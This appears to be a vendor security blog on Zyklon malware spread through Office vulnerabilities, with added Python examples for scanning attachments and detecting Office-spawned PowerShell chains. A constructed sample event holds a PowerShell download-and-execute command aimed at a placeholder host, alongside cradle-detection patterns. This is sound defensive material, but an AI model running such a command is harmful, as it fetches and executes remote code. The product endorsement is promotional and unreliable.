Zyklon malware proliferating via MS Office security loopholes


Cyber attackers are exploiting three recently uncovered vulnerabilities in MS Office to spread the multifunction Zyklon malware, security researchers warn.

The Zyklon malware has existed since 2016; it was created to carry out distributed denial of service (DDoS) attacks, log keystrokes, steal passwords, and mine cryptocurrency.

Zyklon malware can do more than that: it can execute additional plugins, update and remove itself, and, if configured to do so, communicate with its command and control (C2) server over The Onion Router (Tor) network.

The Zyklon malware “automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero”, and lets online criminals hijack the clipboard to replace a user’s bitcoin address with an address controlled by the cybercriminals.

Of late, Zyklon malware attacks have been carried out through spam emails; the malware typically arrives as an attached .zip file containing a malicious .doc file.
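The delivery pattern above (an archive wrapping an Office document) is something a mail gateway or triage script can check for before the file reaches a user. The following is an added example, not Comodo's code or the researchers' tooling: it opens a .zip attachment, lists any Office documents inside it, flags legacy OLE binaries (the container format the Equation Editor flaw CVE-2017-11882 lives in) for sandbox detonation, and looks inside OOXML documents for a DDE field instruction. The sample attachment is constructed inline with a harmless placeholder field; the extension list and the `DDEAUTO`/`DDE` field-instruction check are the author's assumptions, not anything taken from the page.

```python
"""Triage an e-mail attachment archive for the .zip -> Office document pattern.
Added example, not the page's or Comodo's code; all sample data is constructed."""
import io
import re
import zipfile

OFFICE_EXTENSIONS = (".doc", ".docx", ".docm", ".rtf", ".xls", ".xlsx", ".ppt", ".pptx")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary Office container
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML (.docx etc.) is itself a zip
# DDE field instructions appear inside <w:instrText> elements of word/*.xml.
DDE_FIELD = re.compile(rb"<w:instrText[^>]*>\s*(?:DDEAUTO|DDE)\b", re.IGNORECASE)


def inspect_document(name: str, data: bytes) -> list[str]:
    """Return findings for one document extracted from the outer archive."""
    findings = []
    if data.startswith(OLE_MAGIC):
        # Binary .doc/.xls cannot be parsed here; route it to the sandbox.
        findings.append(f"{name}: legacy OLE document, needs sandbox/detonation")
    elif data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as docx:
            for member in docx.namelist():
                if member.startswith("word/") and member.endswith(".xml"):
                    if DDE_FIELD.search(docx.read(member)):
                        findings.append(f"{name}: DDE field in {member}")
    elif data.lstrip().startswith(b"{\\rtf"):
        # Content and extension disagree: RTF body behind an Office extension.
        findings.append(f"{name}: RTF content with an Office extension")
    return findings


def scan_attachment(zip_bytes: bytes) -> list[str]:
    """Open the outer .zip attachment and inspect every Office document in it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for info in outer.infolist():
            if info.filename.lower().endswith(OFFICE_EXTENSIONS):
                findings.append(f"{info.filename}: Office document inside zip attachment")
                findings.extend(inspect_document(info.filename, outer.read(info)))
    return findings


def build_sample_attachment() -> bytes:
    """Construct a sample .zip: a .docx carrying a placeholder DDE field, an
    OLE header stub and a harmless text file. Constructed test data only."""
    document_xml = (
        b'<?xml version="1.0"?><w:document><w:body><w:p>'
        b'<w:fldChar w:fldCharType="begin"/>'
        b'<w:instrText xml:space="preserve">DDEAUTO placeholder-field</w:instrText>'
        b'<w:fldChar w:fldCharType="end"/></w:p></w:body></w:document>'
    )
    docx = io.BytesIO()
    with zipfile.ZipFile(docx, "w") as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("word/document.xml", document_xml)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("invoice.docx", docx.getvalue())
        z.writestr("scan.doc", OLE_MAGIC + b"\x00" * 32)   # header stub, not a real document
        z.writestr("readme.txt", b"plain text, ignored")
    return outer.getvalue()


if __name__ == "__main__":
    for line in scan_attachment(build_sample_attachment()):
        print(line)
```

The scanner deliberately stops at "flag and contain" for binary OLE files rather than trying to parse them: the point, matching the Zero Trust argument later in the post, is that an unknown document is held for analysis instead of being passed through because nothing recognised it as bad.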

The primary sectors targeted by Zyklon malware are insurance, financial services, and telecommunications. However, industry experts and researchers have warned organizations in all sectors to stay alert. In their own words from a blog post – “It is highly likely that the threat actors will eventually move outside the scope of their current targeting.”

The malicious .doc file used by Zyklon exploits known vulnerabilities in Microsoft Office. When it is opened on a vulnerable system, a PowerShell-based payload takes over. According to the researchers, the PowerShell script is responsible for downloading the final payload from a C2 server and executing it. The three vulnerabilities exploited by the .doc file are the Dynamic Data Exchange (DDE) communication mechanism, CVE-2017-11882, and CVE-2017-8759. “These types of threats show why it is essential to ensure that all software is fully updated.”
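The chain just described (Office document opened, PowerShell launched, final payload fetched from the C2 server) is visible in endpoint process-creation telemetry even when the document itself slipped past the mail filter. The following is an added example, not Comodo's or the researchers' code: it walks the parent chain of every script host and alerts when an Office process is among its ancestors, rating the alert higher when the command line carries download-and-execute markers. The events are constructed to resemble Sysmon Event ID 1 records; the process-name sets, the three-hop depth and the marker regex are the author's assumptions. The Equation Editor process `eqnedt32.exe` is included as an Office host because the CVE-2017-11882 component runs as its own process rather than inside Word.

```python
"""Detect Office -> script host -> download chains in process-creation events.
Added example, not the page's or Comodo's code; all events are constructed."""
import re
from dataclasses import dataclass

# Processes that should not legitimately spawn a script host on a workstation.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                "eqnedt32.exe"}  # Equation Editor, the CVE-2017-11882 component
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Command-line fragments typical of a download-and-execute stage (heuristic).
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b"
    r"|-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden|bypass",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str          # image file name only, e.g. "winword.exe"
    command_line: str


def office_ancestor_chain(event, by_pid, max_depth=3):
    """Walk up the parent chain. Return the image names from the first Office
    ancestor down to the event, or None if no Office host is within max_depth."""
    chain = [event.image.lower()]
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current.ppid)
        if parent is None:            # root of what we can see in this log
            return None
        chain.insert(0, parent.image.lower())
        if parent.image.lower() in OFFICE_HOSTS:
            return chain
        current = parent
    return None


def detect_office_script_chains(events):
    """Return one alert per script host that descends from an Office process."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.image.lower() not in SCRIPT_HOSTS:
            continue
        chain = office_ancestor_chain(e, by_pid)
        if chain is None:
            continue
        severity = "high" if CRADLE.search(e.command_line) else "medium"
        alerts.append({"pid": e.pid, "chain": chain, "severity": severity,
                       "command_line": e.command_line})
    return alerts


# Constructed sample telemetry (c2.invalid is a placeholder host).
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcessEvent(200, 100, "winword.exe", 'WINWORD.EXE /n "C:\\Users\\user\\Downloads\\invoice.doc"'),
    ProcessEvent(300, 200, "powershell.exe",
                 "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://c2.invalid/stage')\""),
    ProcessEvent(400, 50, "svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcessEvent(410, 400, "eqnedt32.exe", '"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" -Embedding'),
    ProcessEvent(420, 410, "cmd.exe", "cmd.exe /c echo placeholder"),
    ProcessEvent(500, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
    ProcessEvent(550, 1, "monitoringagent.exe", "monitoringagent.exe --service"),
    ProcessEvent(600, 550, "powershell.exe", "powershell.exe -c (New-Object Net.WebClient).DownloadString('https://updates.example/ok')"),
]

if __name__ == "__main__":
    for alert in detect_office_script_chains(SAMPLE_EVENTS):
        print(alert["severity"].upper(), " -> ".join(alert["chain"]), alert["command_line"])
```

The rule keys on lineage rather than on the command line alone: the last two sample events show a benign administrative script and an agent that legitimately downloads content, neither of which is flagged because no Office process sits above them, while the Equation Editor chain is flagged at medium severity even though its command line is unremarkable.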

Zyklon malware has the potential to generate significant revenue for the cybercriminals. That online criminals use vulnerabilities in MS Office to install malware, which can then be remotely controlled to deliver those attacks, will not surprise many people.

When a business is under Zyklon malware attack, it should be ready to counter it. Having proactive security in place helps handle the situation calmly. Comodo Endpoint Security software is the best option to combat Zyklon malware. Comodo AEP, or Advanced Endpoint Protection, can detect and locate the source of the breach in no time, which is of paramount importance.

Why Comodo AEP (Advanced Endpoint Protection)?

In the present competitive business world, the term “endpoint” has become interchangeable with any device that can connect to a network, namely laptops, desktops, smartphones, tablets, and most recently, IoT devices. As endpoints continue to evolve, so do the threats. Sadly, traditional antivirus software and firewalls can no longer shield an organization’s changing environment. Endpoints are exposed to a plethora of malicious activity like Zyklon malware.

So how should today’s businesses protect against threats such as Zyklon malware? Overall, businesses need a better understanding of the evolving risks and of how to select the “right” endpoint protection platform (EPP).

Unknown Files That Drive the Change

Unknown files – unrecognized executable files that may be malicious – have grown in number in the last 3 to 5 years. According to research conducted by Comodo, at least 300,000 new malicious files are detected daily. Dealing with new malware is one of the most critical challenges for any EPP.

Most EPP products use a Default Allow posture, an assumption-based trust model, when dealing with new or unknown files. This method gives any file that is not a known harmful file unfettered write privileges to system files; it assumes that files not identified as bad must be safe. As you can imagine, one of the significant problems with a Default Allow security posture is that cybercriminals continually build new variants to evade detection by these endpoint solutions. This can leave companies exposed to threats for days, weeks, even months before they are detected.

Sandbox Testing and further analysis

Many EPP vendors have integrated sandbox technology into their products to fight off malicious software such as Zyklon malware and have successfully thwarted attacks with it. For those unfamiliar, a sandbox is an isolated, virtualized environment that mimics the endpoint’s operating environment so that unknown files can be executed safely, without risking harm to the host device or network.

Nevertheless, this once beneficial solution is beginning to lose its effectiveness. Cybercriminals are creating threats that can detect when they are running in a sandbox and automatically take steps to avoid detection. Also, sandboxes are becoming more resource-intensive and more complex, which slows their ability to process threats without hindering productivity.

Zero Trust Architecture – The Need for It

Cybercriminals use the Default Allow approach to their benefit: by making changes to their variants, they are able to bypass sandboxes, so organizations require a better solution.

The simple answer is to choose a Zero Trust architecture, where unknown executables are never allowed to run unchecked and are continuously tested, without affecting users’ productivity. In the right Zero Trust architecture, all unknown files are immediately contained and analyzed in the cloud, with human analysts where needed, to prevent breaches. At the same time, the business still needs to work, and users should not face hiccups that lead to lost productivity. Achieving a proper Zero Trust architecture can be considered a business success in itself, as it safeguards the business from vicious online attacks.

Good Practices for Shortlisting an Endpoint Protection Solution

Protecting endpoints from malicious software, intrusions, and cyber-attacks is one of the most critical aspects of protecting a company’s IT resources. The EPP must be part of a holistic IT security approach in which network perimeter security solutions enforce the boundary between a service provider’s network and the internal network, and endpoint protection further decreases the threat of malicious activities that could negatively impact IT operations.

The first step in choosing an Endpoint Protection solution is determining the requirements of the business, which should include compliance, capacity and scalability, budget, and policies. The next step is to examine capabilities, including but not limited to centralized management, unknown file handling, threat detection and blocking, file reputation scoring and verdicts, and support for achieving a Zero Trust architecture.

Select the Right Endpoint Protection by Running an Effective Proof of Concept

Besides the best practices stated above, Gartner recently published a research paper suggesting that security and risk management leaders should run a thorough proof of concept to accurately determine which endpoint protection platform is the most suitable.
